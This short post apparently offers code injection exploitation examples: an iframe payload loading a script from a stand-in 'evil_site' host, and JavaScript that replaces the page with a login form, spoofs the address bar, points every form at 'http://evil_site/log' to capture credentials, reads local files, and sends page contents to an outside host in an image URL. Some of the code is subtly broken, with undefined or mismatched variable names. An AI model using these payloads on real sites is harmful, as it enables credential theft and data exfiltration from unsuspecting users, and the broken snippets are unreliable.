Code injection Exploitation Examples !

@Abdelmoughite Eljoaydi

/**
<iframe src="http://evil_site/phishing.js"></iframe>
*This payload injects an iframe tag that will load the script located at "/phishing.js”.
*Let’s take a look at what phishing.js could contain:
*/

// Function to override the HTML content.
function override(url) {
var xhr_req = new XMLHttpRequest();
xhr_req.open('GET', url, false);
xhr_req.onreadystatechange = function () {
if (xhr_req.readyState == 4 && xhr_req.responseText != "") {
document.innerHTML = xhr_req.responseText;
}
}
xhr_req.send(null);
}

//Call override(url) function to override the current page with the content of "LoginForm.jsp".
override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.

//Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp).
var stateObj = { log: "login" };
history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp");

//Hooking forms and submit victim credentials to "http://evil_site/log".
var forms = document.getElementsByTagName("form");
for (index = 0; index < forms.length; index++) {
void(forms[index].action = "http://evil_site/log");
}
==============================================================================================================================
//Reading local files. (works only on Firefox)

function _LFileAccess(_method,action,argv){

    req.open(_method,action,false);
    if(_method=="POST")
    req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    req.send(argv);
    return req.responseText;
    }
    var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null);
    dump(local_file);

//Screen-capture of the current page state.
    XMlHttpReq.open("GET","example.com",false);
    function getURL(s) {
    var image = new Image();
    image.style.width = 0;
    image.style.height = 0;
    image.src = s;
    }
    getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText);